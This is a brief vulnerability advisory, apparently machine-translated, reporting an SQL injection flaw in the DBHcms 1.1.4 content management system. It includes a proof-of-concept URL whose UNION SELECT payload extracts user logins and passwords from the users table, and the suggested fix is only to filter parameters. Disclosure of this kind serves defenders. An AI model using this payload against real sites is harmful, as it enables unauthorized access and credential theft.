DBHcms 1.1.4 SQL injection vulnerability and fix-vulnerability warning-the black bar safety net

2010-10-27T00:00:00
ID MYHACK58:62201028202
Type myhack58
Reporter 佚名
Modified 2010-10-27T00:00:00

Description

Vulnerability Description: The DBHcms is a for personal and small business website open source content management system, while developing in multiple languages good support for search engine optimization. Program vulnerability the main reason is not on the submitted parameters are strictly filtered, resulting inSQL injectionattack the vulnerabilities generated.

SQL injectiontest code: http://192.168.1.100/DBHcms/index.php?dbhcms_pid=-81&editmenu=-2+union+select+1,2,3,4,5,6,group_concat(user_login,0x3a,user_passwd),8,9,1 0,1 1,1 2,1 3,1 4+from+dbhcms_cms_users--

Repair solutions:

Filtered submission parameters